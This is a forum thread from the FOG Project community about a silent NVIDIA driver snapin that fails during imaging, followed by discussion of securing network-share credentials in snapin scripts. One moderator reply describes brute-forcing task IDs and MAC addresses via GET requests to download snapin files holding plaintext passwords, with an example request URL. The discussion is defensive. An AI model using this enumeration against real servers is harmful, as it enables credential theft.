Snapin script interrupted by Hostname Changer before completion (I think)


  • Testers

    Hi Everyone,
    I am just starting to play around with snapins. I have a situation where pre-installing a video driver on an image causes it to fail during sysprep when deployed. I figured, why not try a snapin to install it silently after sysprep? The most efficient way I could think of was to write a short batch file and reference the installer on a network share that is temporarily mapped for the install then removed. See below:

    echo off
    
    pushd \\homead\tech\bpi\nvidia
    
    setup.exe -s
    
    popd
    

    When I run the snapin from the FOG gui on an already imaged host, it works flawlessly. Installs silently and reboots. However, when I register a host, associate a snapin and image, and choose to image it that way, it does not work. In the snapin log for the host post imaging, it says it completed in 30 seconds and returned code 0. I reckon that’s not enough time to install a full video driver. My theory is that the snapin is being run pre-hostname change and gets interrupted by the changing of the hostname and joining the domain. I’m no scripting expert, but I tried to force the batch file to “wait” until the install was done:

    echo off
    
    pushd \\homead\tech\bpi\nvidia
    
    start /wait setup.exe -s
    
    popd
    

    Alas, it still “finishes” in thirty seconds and fails to install it before the hostname is changed. Please feel free to point out any glaring mistakes, I won’t take it personally :)

    As always, thanks in advance for your help.

    Paul


  • Testers

    @Wayne-Workman I am not in the business to hack FOG either. But as I work in healthcare and we are a small shop one of my many hats is security, with PHI concerns I think about all possible attack surfaces. We have regular audits of our security and have to justify any thing that is of questionable nature. Right now I am working on closing up a few other areas, and I have been thinking of ways to harden software deployment through snapins. Currently we have a separate vlan for FOG and only deploy snapins at time of imaging, then remove the log and use the client just for user tracking and rebooting basically. I will push small single file snapins, if I need to, but nothing that needs to connect to a share due to not having a good way to do so. I love FOG and it works great, just like to include my thoughts on things to help further FOG and keep it as secure as possible along the way.

    FOG 2.0 will be a huge advancement again I am sure. Just like 1.3 is truly leaps and bounds better than .3x was. I thought .3x was great, but the issues were definitely addressed. With all software there is always compromises to maintain backwards compatibility for longer than any @Developers would really want to do. In my opinion 1.3 is not just a decimal increment to 1.2, it is much closer to a 2.0 version. But with the true 2.0 they can finally drop support for the legacy client, partimage, and it sounds like move away from PHP. It will definitely be a more robust and modern system.


  • Moderator

    @ITSolutions said in Snapin script interrupted by Hostname Changer before completion (I think):

    But they can still be intercepted using @Wayne-Workman’s example of scanning tasks with MAC’s as the information is still transmitted and read by the client.

    Ah, didn’t even think about that, even when I was looking at the plain-text snapin arguments in a web browser using the below GET method. But I’m positive a determined hacker would have thought about it. I’m not in the business of trying to hack FOG, the things I said below were just passing thoughts, no real effort was put in.

    I think what I was looking at though was for Legacy Client compatibility. The New FOG Client gets it’s snapin info via encrypted communication as @jbob said earlier.

    So… I guess we need a way to disable legacy client support should someone want that, and again @jbob is two steps ahead and already mentioned it.


  • Testers

    @Wayne-Workman and @Jbob I fully agree that you should never use plain text passwords, very bad idea! Like I was saying the randomize password script I was thinking about was to work around limitations within FOG at the time, including now for that matter. If the password changed at times the attack window would be minimized. If someone did get the password it would expire during the next change and no longer be good. This also would eliminate the human error of “random” passwords, all random passwords by humans are bad, and mostly predictable over time.

    @Jbob That would be great and make it much more secure, if we could hide the snapin details in the log we could negate plaintext passwords all together. But they can still be intercepted using @Wayne-Workman’s example of scanning tasks with MAC’s as the information is still transmitted and read by the client.

    The other thought I had in regards to the client being able to support this type of thing is if we could have the option to map a network share through the snapin management. Have a check box for “map network share and use that location”. Then have a configurable share location in the database. The client would map the share, launch the snap in, perform the task, and disconnect when finished.

    As for simplicity the hiding details would be easier and less prone to bugs. But a configurable default share with a check box would be a quicker way of reusing a share for multiple snapins over time.

    The problem is anything is hack able given the determination of the attacker. The question is how much effort do they need to put in and how much convince do you give up? Not trying to be negative about it, but it is what keeps us in jobs. I enjoy the discussion and glad that we can discuss the ideas/issues/solutions we have to make FOG a better and more secure system.



  • @Wayne-Workman Thank you for clarifying this for me!


  • Moderator

    @michael_f That’s the idea. and if this can be removed from the fog logs as @jbob said, it’d be pretty legit.



  • @Jbob That would mean, i could securly put my arguments here:
    0_1463426663678_snapin.png

    and in the script I connect my share like

    net use \\share\folder  /user:%1 %2 
    

    That would be a great feature!


  • Moderator

    @Jbob said in Snapin script interrupted by Hostname Changer before completion (I think):

    Another option:
    Bake in your user share password into some SYSTEM read-only file on your image and make your batch script read it for the credentials.

    Even then, the NFS shares are readable by anyone, and one could restore the image to a linux directory via CLI and then browse to the files.

    I would urge everyone to stay away from clear-text passwords.


  • Senior Developer

    @ITSolutions just throwing my 2 cents in here. Do not use plain text password hard-coded into a file. In the next version of the client we could easily add a checkbox to snapins “Hide snapin details in fog.log”. With that you could make the password a parameter to the batch script. For example:

    RunWith: cmd.exe
    RunWithArgs: /c
    File: MyBatchScript.cmd
    Args: MyPassword
    

    Snapin configuration is transmitted in a secure median whereas the file itself is obtained via a simple http download and then a sha512 is generated and compared against a security transmitted checksum to ensure integrity. Now if you really wanted to be secure you’d also need to disable the legacy client support as a potential attack vector would be to make the legacy client API calls before the new client has a chance to grab the snapin information, thereby giving it in plain text. I’m not sure if we have such a checkbox to disable the legacy client yet so pinging @Tom-Elliott.

    Another option:
    Bake in your user share password into some SYSTEM read-only file on your image and make your batch script read it for the credentials.


  • Moderator

    @michael_f said in Snapin script interrupted by Hostname Changer before completion (I think):

    @ITSolutions I am using network shares too, and agree with you that deleting the connection at the end and using a restricted account is a quite good idea.

    But I still can’t see the security risk in putting the credentials in the script:
    The script is stored on the fog server, which should be secure.
    It is afaik sent to the client encrypted if using the new fog client.
    On the client-side the script is executed with system-privileges, so an eventually logged in user can’t access the script? Or is the script saved readable in a temporary file?
    If the credentials are sent encrypted to the server by the “net use”-command (which I assume), how can somebody get access to the credentials?

    Maybe I got something wrong? I would really apreciate, if someone could clarify this.

    It wouldn’t be difficult to snatch the script with the clear-text passwords in it from the server. It would be a matter of having a MAC (or list of MACs) from your environment (easy), finding the FOG Server’s IP (easy), and then writing a basic script to guess at the taskid. Then it’s just a matter of iterating through a most-probable range of task IDs and through a single or large list of MACs with GET requests… like this one:
    http://10.2.1.11/fog/service/snapins.file.php?mac=90:B1:1C:98:03:8C||00:00:00:00:00:00:00:E0&taskid=3274

    The most-probable range of task IDs is easy to determine by looking at any c:\fog.log file. Even if you couldn’t access the log to determine a most-probable range of task IDs, you could just iterate through 5,000 of them and likely hit the valid one. Once a valid one is hit, the snapin download starts. An attacker wouldn’t even need to know the task’s name or any associated files names.

    Plain-Text passwords are never secure.


  • Testers

    @michael_f With the new client you are right about it being encrypted in transit. But the snapin’s are transferred to the client and stored in a temp folder under the FOG install location(C:\Program Files(x86)\FOG\tmp) before being executed, this would be the script with the credentials. This could result in the file with the credentials remaining on the client due to various reasons. Such as if the client gets the snapin and is immediately shut down or the service is stopped and the temp files are not removed. Also given that it is saved on the client it is possible to recover the data using file recovery tools even after deletion.

    I had come up with the idea of the random password with the old client as it sent in plain text over the network. But as I didn’t have time, I never got around to working on it. Now with the new client it is less likely to get the snapin file, but still very possible. It all depends on the level of security you need/want for the distribution share. If you keep the share locked down, with little or no information other than programs files that can be installed, the risk is very minimal. That is were I am now, doesn’t seem to be worth the effort, security vs convince, there will always be a trade off.

    I know I am going way off of the extreme cautious and almost tin-foil hat security concerns, but just thoughts on if you really want to ensure that passwords are truly secure.



  • @ITSolutions I am using network shares too, and agree with you that deleting the connection at the end and using a restricted account is a quite good idea.

    But I still can’t see the security risk in putting the credentials in the script:
    The script is stored on the fog server, which should be secure.
    It is afaik sent to the client encrypted if using the new fog client.
    On the client-side the script is executed with system-privileges, so an eventually logged in user can’t access the script? Or is the script saved readable in a temporary file?
    If the credentials are sent encrypted to the server by the “net use”-command (which I assume), how can somebody get access to the credentials?

    Maybe I got something wrong? I would really apreciate, if someone could clarify this.


  • Testers

    @michael_f Yeah, I would use net use in the script. With the new FOG client it is a little more secure since it uses certs. But the script does still have the credentials in it. When I used it I would create a very restricted account, to access the share. Then remove the mapping it at the end of the script. This basically was security by obscurity. But I felt it was better than a fully open share that a simple scan could find and have access to.

    An Idea I had but have never had time to explore is creating a bash script to update the password for a share at set or random intervals.

    on FOG install samba
    Create a user “snapin user” with whatever rights you needed(probably read-only, but could be write if needed)
    Create a bash script to randomly create a password and set it for “Snapin user” and also update a net use script in the snapin dir with new password.

    Then you would use that script to push out as a snap in and just pass the net use script what file to run on the share. So it would be:
    Run with: CMD.exe
    Snapin: Net Use script
    Arguments: “mapped drive”\Install_programx

    It is complicated but if you are really needed the security it can work to avoid having unchanging credentials passed to your PC’s.



  • @ITSolutions said in Snapin script interrupted by Hostname Changer before completion (I think):

    … my other example of passing credentials over a snap in is not the best security practice by any means.

    @ITSolutions Thats interesting, could you please elaborate on this a bit? Does the “net use”-command send passwords in plain text?


  • Testers

    @fry_p There are reasons for every way of doing things. Having an open share is a big security risk, and my other example of passing credentials over a snap in is not the best security practice by any means. Just wanted to give the other options that others may find useful. So in terms of security your solution is the best choice.

    Model specific is great, quicker deployments since sysprep is not needed and easier to manage in many ways. When I worked for in the schools I wish we could have gotten to that point. But part of our issue was I was at an ISD and we supported the technology that each school choose. With 18 districts you ended up with everything under the sun. Now I am in a small community health care org and we have model specific images for our 10 models we currently have and are narrowing down to even less of a mix.


  • Testers

    @ITSolutions I suppose my method is a band-aid fix of sorts. At my place of work, we are moving to standardize the models of PC’s we are putting in. By the time next school year starts, we will have about 75% of all of the PC’s in the network be Dell Optiplex 5040’s. Ultimately, we are going the model-specific route of images since we only have a handful of models we use. I agree with what you are saying though.


  • Testers

    @fry_p I also like to use shares for the updating issue. If that driver ever needs updated then you need to update the image. On a share you just replace the file. I have a small samba share on my FOG server that has installers and scripts that I use just for deployment. Just need to make sure there is no sensitive info on that share. I have also set up a site where every script that is pushed through FOG maps a drive with a UN/Password in the script before executing the installer. Not the best, but safer than an open share.


  • Moderator

    @fry_p Putting the files on the image is one solution - but for people making universal images, shares are a good solution.


  • Testers

    @Jbob @ITSolutions I figured out what it was. Jbob was right on the money. I didn’t have anonymous authentication permissions on the share it was on. I ran the script manually and it threw an authentication (bad UN/PW) error. Then I had a thought: why use a share in the first place? I can just put the driver installation files in the image and use the batch file to point at them after imaging! I was over-complicating it really. I am trying this method now. Will keep you posted


  • Testers

    This sounds to me like it is a self-extracting exe and that it kicks off an MSI after the exe finishes extracting. So the script waits, but when the exe is done it continues. The problem is that the MSI, the actual driver install is still running. You maybe able to use 7zip and extract the exe and then find the MSI installer and run it silently instead. I have had to do that for many driver installs.

    @michael_f gave a good suggestion if you don’t need anything more than the drive itself, but if you need the Nvidia software also then my suggestion maybe a better option. I know some video cards are picky if they don’t have their entire package installed.


Log in to reply
 

1012
Online

39193
Users

10845
Topics

103221
Posts

Looks like your connection to FOG Project was lost, please wait while we try to reconnect.